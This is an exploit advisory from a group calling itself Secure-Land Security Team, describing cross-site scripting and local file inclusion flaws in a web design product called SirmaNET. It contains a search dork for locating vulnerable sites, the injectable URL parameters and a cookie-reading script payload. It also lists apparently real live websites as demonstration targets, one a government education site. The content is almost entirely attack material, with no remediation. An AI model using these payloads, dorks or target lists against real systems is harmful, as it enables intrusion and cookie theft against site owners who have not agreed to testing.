SirmaNET Web Design suffers from cross site scripting and local file inclusion vulnerabilities.
82d0637ff83a42cc44ed8c044e1f9e0dcabe34f24bbab3100d24e3c13d2e84a5
########################################################################################
# #
# Exploit Title : SirmaNET Web Design Multiple Vulnerabilities #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Vendor : www.sirmanet.com #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# DorK : inurl:"index.php?sayfa=altmenu.php" #
# #
# #
########################################################################################
# #
# [XSS]: #
# #
# http://[TarGeT]/index.php?sayfa=altmenu.php&ustmenu=[XSS] #
# http://[TarGeT]/index.php?sayfa=altmenu.php&baslik1=[XSS] #
# #
# ~xss : #
# #
# ><script >alert(document.cookie)</script> #
# #
# [LFI] : #
# #
# http://[TarGeT]/index.php?sayfa=[LFI] #
# #
# #
# Demo : #
# #
# http://basaksehir.meb.gov.tr/index.php?sayfa=altmenu.php&ustmenu=[XSS] #
# http://www.yigitemlakfinans.com/index.php?sayfa=altmenu.php&baslik1=[XSS] #
# http://www.germanica.com.tr/index.php?sayfa=altmenu.php&ustmenu=[XSS] #
# www.yigitemlakfinans.com/index.php?sayfa=[LFI] #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################